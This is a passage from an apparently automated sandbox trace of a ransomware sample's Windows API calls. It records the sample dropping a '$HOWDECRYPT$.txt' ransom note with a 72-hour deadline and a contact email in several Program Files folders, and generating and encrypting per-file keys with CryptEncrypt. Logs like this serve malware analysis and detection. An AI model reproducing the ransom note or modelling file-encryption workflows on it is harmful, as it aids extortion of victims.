(lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpasdesc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.345] GetProcessHeap () returned 0x2c0000 [0162.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.345] GetProcessHeap () returned 0x2c0000 [0162.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06db8 | out: hHeap=0x2c0000) returned 1 [0162.345] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\uninstall information\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.346] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.346] WriteFile (in: hFile=0x178, lpBuffer=0x25ce617*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce740, lpOverlapped=0x0 | out: lpBuffer=0x25ce617*, lpNumberOfBytesWritten=0x25ce740*=0x127, lpOverlapped=0x0) returned 1 [0162.347] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.347] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce740, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce740*=0x2ac, lpOverlapped=0x0) returned 1 [0162.347] CloseHandle (hObject=0x178) returned 1 [0162.347] GetProcessHeap () returned 0x2c0000 [0162.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06ce8 | out: hHeap=0x2c0000) returned 1 [0162.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6e0 | out: pbBuffer=0x25ce6e0) returned 1 [0162.347] GetProcessHeap () returned 0x2c0000 [0162.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6d8*=0x30) returned 1 [0162.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\.." (normalized: "c:\\program files (x86)"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.347] GetProcessHeap () returned 0x2c0000 [0162.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.348] GetProcessHeap () returned 0x2c0000 [0162.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebeb40 | out: hHeap=0x2c0000) returned 1 [0162.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6d8 | out: pbBuffer=0x25ce6d8) returned 1 [0162.348] GetProcessHeap () returned 0x2c0000 [0162.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6d0*=0x30) returned 1 [0162.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\." (normalized: "c:\\program files (x86)\\uninstall information\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.348] GetProcessHeap () returned 0x2c0000 [0162.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.348] GetProcessHeap () returned 0x2c0000 [0162.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebea90 | out: hHeap=0x2c0000) returned 1 [0162.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.349] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.349] WriteFile (in: hFile=0x178, lpBuffer=0x25ce60b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce734, lpOverlapped=0x0 | out: lpBuffer=0x25ce60b*, lpNumberOfBytesWritten=0x25ce734*=0x127, lpOverlapped=0x0) returned 1 [0162.350] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.350] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce734, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce734*=0x2ac, lpOverlapped=0x0) returned 1 [0162.350] CloseHandle (hObject=0x178) returned 1 [0162.350] GetProcessHeap () returned 0x2c0000 [0162.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06328 | out: hHeap=0x2c0000) returned 1 [0162.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.351] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.351] WriteFile (in: hFile=0x178, lpBuffer=0x25ce607*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce730, lpOverlapped=0x0 | out: lpBuffer=0x25ce607*, lpNumberOfBytesWritten=0x25ce730*=0x127, lpOverlapped=0x0) returned 1 [0162.352] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.352] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce730, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce730*=0x2ac, lpOverlapped=0x0) returned 1 [0162.352] CloseHandle (hObject=0x178) returned 1 [0162.352] GetProcessHeap () returned 0x2c0000 [0162.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb1c98 | out: hHeap=0x2c0000) returned 1 [0162.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.353] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.353] WriteFile (in: hFile=0x178, lpBuffer=0x25ce603*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce72c, lpOverlapped=0x0 | out: lpBuffer=0x25ce603*, lpNumberOfBytesWritten=0x25ce72c*=0x127, lpOverlapped=0x0) returned 1 [0162.353] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.353] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce72c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce72c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.354] CloseHandle (hObject=0x178) returned 1 [0162.354] GetProcessHeap () returned 0x2c0000 [0162.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb330 | out: hHeap=0x2c0000) returned 1 [0162.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.355] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.355] WriteFile (in: hFile=0x178, lpBuffer=0x25ce5ff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce728, lpOverlapped=0x0 | out: lpBuffer=0x25ce5ff*, lpNumberOfBytesWritten=0x25ce728*=0x127, lpOverlapped=0x0) returned 1 [0162.356] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.356] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce728, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce728*=0x2ac, lpOverlapped=0x0) returned 1 [0162.356] CloseHandle (hObject=0x178) returned 1 [0162.356] GetProcessHeap () returned 0x2c0000 [0162.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae4b8 | out: hHeap=0x2c0000) returned 1 [0162.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6c8 | out: pbBuffer=0x25ce6c8) returned 1 [0162.356] GetProcessHeap () returned 0x2c0000 [0162.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6c0*=0x30) returned 1 [0162.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.357] GetProcessHeap () returned 0x2c0000 [0162.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.357] GetProcessHeap () returned 0x2c0000 [0162.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaae48 | out: hHeap=0x2c0000) returned 1 [0162.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6c0 | out: pbBuffer=0x25ce6c0) returned 1 [0162.357] GetProcessHeap () returned 0x2c0000 [0162.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.357] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6b8*=0x30) returned 1 [0162.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.357] GetProcessHeap () returned 0x2c0000 [0162.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.357] GetProcessHeap () returned 0x2c0000 [0162.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6130 | out: hHeap=0x2c0000) returned 1 [0162.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6c0 | out: pbBuffer=0x25ce6c0) returned 1 [0162.357] GetProcessHeap () returned 0x2c0000 [0162.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6b8*=0x30) returned 1 [0162.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.358] GetProcessHeap () returned 0x2c0000 [0162.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.358] GetProcessHeap () returned 0x2c0000 [0162.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82418 | out: hHeap=0x2c0000) returned 1 [0162.358] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6b8 | out: pbBuffer=0x25ce6b8) returned 1 [0162.358] GetProcessHeap () returned 0x2c0000 [0162.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6b0*=0x30) returned 1 [0162.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.358] GetProcessHeap () returned 0x2c0000 [0162.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.358] GetProcessHeap () returned 0x2c0000 [0162.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaad40 | out: hHeap=0x2c0000) returned 1 [0162.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6b8 | out: pbBuffer=0x25ce6b8) returned 1 [0162.359] GetProcessHeap () returned 0x2c0000 [0162.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6b0*=0x30) returned 1 [0162.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.359] GetProcessHeap () returned 0x2c0000 [0162.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.359] GetProcessHeap () returned 0x2c0000 [0162.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6018 | out: hHeap=0x2c0000) returned 1 [0162.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6b0 | out: pbBuffer=0x25ce6b0) returned 1 [0162.359] GetProcessHeap () returned 0x2c0000 [0162.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6a8*=0x30) returned 1 [0162.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.359] GetProcessHeap () returned 0x2c0000 [0162.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.359] GetProcessHeap () returned 0x2c0000 [0162.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c822f0 | out: hHeap=0x2c0000) returned 1 [0162.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6b0 | out: pbBuffer=0x25ce6b0) returned 1 [0162.360] GetProcessHeap () returned 0x2c0000 [0162.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6a8*=0x30) returned 1 [0162.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.360] GetProcessHeap () returned 0x2c0000 [0162.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.360] GetProcessHeap () returned 0x2c0000 [0162.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaac38 | out: hHeap=0x2c0000) returned 1 [0162.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6a8 | out: pbBuffer=0x25ce6a8) returned 1 [0162.360] GetProcessHeap () returned 0x2c0000 [0162.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6a0*=0x30) returned 1 [0162.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.360] GetProcessHeap () returned 0x2c0000 [0162.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.361] GetProcessHeap () returned 0x2c0000 [0162.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5f00 | out: hHeap=0x2c0000) returned 1 [0162.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6a8 | out: pbBuffer=0x25ce6a8) returned 1 [0162.361] GetProcessHeap () returned 0x2c0000 [0162.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, 